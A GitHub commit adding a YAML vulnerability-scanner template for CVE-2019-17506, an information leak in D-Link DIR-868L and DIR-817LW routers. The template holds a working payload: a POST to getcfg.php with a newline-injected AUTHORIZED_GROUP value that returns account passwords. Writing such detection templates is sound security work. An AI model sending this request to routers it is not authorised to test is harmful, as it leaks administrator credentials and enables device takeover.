Create CVE-2019-17506.yaml

patch-1
PikPikcU 2021-02-01 00:41:22 +00:00 committed by GitHub
parent e1211fa597
commit a5b2ecedf7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 27 additions and 0 deletions

View File

@ -0,0 +1,27 @@
id: CVE-2019-17506
info:
name: Dlink DIR-868L & DIR-817LW Info Leak
author: pikpikcu
severity: info
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17506
requests:
- method: POST
path:
- "{{BaseURL}}/getcfg.php"
body: |
SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
headers:
Content-Type: text/xml
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</password>"
- "DEVICE.ACCOUNT"
part: body